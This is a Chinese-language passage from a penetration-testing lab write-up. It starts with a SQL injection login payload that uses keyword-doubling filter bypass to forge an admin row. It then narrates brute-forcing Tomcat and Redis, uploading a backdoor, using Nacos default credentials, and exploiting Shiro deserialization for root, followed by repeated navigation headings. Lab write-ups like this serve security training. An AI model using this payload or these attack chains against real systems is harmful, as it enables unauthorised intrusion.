user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dfb2&submit=true&submit.x=17&submit.y=28

20240519000243 之后访问对应的页面就可以了 20240519000304

Shell

172.17.0.2 (www-data)

基于前面获取到的 www-data 用户的 Shell, 尝试获取到一个反向 Shell

Web6

8081

访问服务发现是一个 Tomcat 页面, 直接进行暴力破解获取到 manager 的账号, 上传后门进行操作 20240519000500 20240519000508

Web7

6379

redis 服务, 发现存在密码进行暴力破解, 可以破解得到有个密码 20240519000628 登陆之后我按照传统的方式写入计划任务发现没有用, 就很难受, 但是又没有web 端, 很明显常见的几种方式在这里已经都不适用了, 之后我尝试进行基于之前发现的主机进行 docker 逃逸但是也没有什么效果, 然后我修改了自己已经获取到的 Shell 中的镜像一些 sh 脚本可惜没用

note

没有测试成功, 不知道怎么回事

Web9

8848

访问发现是一个 404 页面, 进行目录的扫描, 发现 nacos 框架, 搜索发现一个默认的密码, 发现可以登陆 20240519000734 登陆之后经过搜索可以发现一个 Key 20240519000852

58080

在这里我看到这个页面, 我想起来之前学习 JAVA 的时候有个 Spring 组件就是这么个默认页面, 但是想不起来我就直接截图谷歌搜索, 结果发现一些内容确定了我的想法, 就是打反序列化的 20240519000913 之后查看 Burp 的请求我发现其中一些特殊的 Cookie , 之后再此搜索将攻击范围在此缩减到 shiro 20240519000928 之后在 Github 寻找到一个工具, 并使用获取的 Key 进行利用即可, 并且是 Root 权限 20240519001015

成都愚安科技靶场

介绍​

端口扫描​

Web1​

80​

Shell​

172.18.240.7​

Web2​

7001​

Shell​

172.16.10.8/172.25.20.10 (root)​

172.25.20.12/172.26.30.4 (Mysql)​

172.26.30.11​

Web3​

22883​

13306​

Web5​

8082​

Shell​

172.17.0.2 (www-data)​

Web6​

8081​

Web7​

6379​

Web9​

8848​

58080​

介绍

端口扫描

Web1

80

Shell

172.18.240.7

Web2

7001

Shell

172.16.10.8/172.25.20.10 (root)

172.25.20.12/172.26.30.4 (Mysql)

172.26.30.11

Web3

22883

13306

Web5

8082

Shell

172.17.0.2 (www-data)

Web6

8081

Web7

6379

Web9

8848

58080